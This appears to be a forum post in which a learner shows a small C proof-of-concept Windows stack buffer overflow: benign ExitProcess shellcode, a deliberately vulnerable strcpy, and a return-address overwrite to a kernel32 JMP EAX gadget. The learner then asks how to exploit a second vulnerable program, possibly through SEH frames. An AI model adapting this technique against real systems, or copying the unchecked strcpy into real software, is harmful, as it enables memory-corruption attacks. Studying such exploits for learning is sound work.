Hello, I have been trying to just figure out buffer overflows on windows to satiate my curiosity. I was able to do a funny little deal that ended up like this:

Code:
#include <string.h>
#include <stdio.h>

char shellcode[] = 
	"\x31\xC0\x50\xB8\xA2\xCA\x81\x7C\xFF\xD0";

void copy(char *s) 
{
	char buf[256];
	strcpy(buf, s);
}

int main()
{
	char buffer[512];

	for(int i = 0; i < 260; i++)
		buffer[i] = 'X';

	memcpy(buffer, shellcode, strlen(shellcode));
	*(int *) (buffer + 260) = 0x7C816353;

	copy(buffer);
	printf("If we got here, it didn't exit like it should have");
	return 0;
}
The shellcode just does an ExitProcess call (hardcoded). And I overflow the return address with the address of a JMP EAX instruction in kernel32, which worked because I was lucky enough that strcpy returns a pointer to the destination string. This is very platform specific right now, and also impractical, I want to be able to do something where I can right a vulnerable program, and an exploit program which attacks it. So something like:

Code:
#include <string.h>

int main(int argc, char **argv)
{
    char buf[256];

    if(argc == 2)
        strcpy(buf, argv[1]);

    return 0;
}
Doing this brings up some problems. Firstly, EAX is zero'ed before exiting, so no JMP/CALL EAX. You would think I would be able to do a JMP/CALL ESP, however, for some reason the compiler (VC), allocates 144h or 324 bytes, and the buffer starts in the middle at EBP-100h, so I can't find a suitable register to use this method.

I was wondering if this method is just too limited and whether I should just abandon it, or whether it could be salvaged. If it can not be salvaged, I am aware of a method which involves abusing SEH frames, but I can not for the life of me figure out how it works. Any help is so so appreciated, and I hope this is not just blown off as a skript kiddy thing.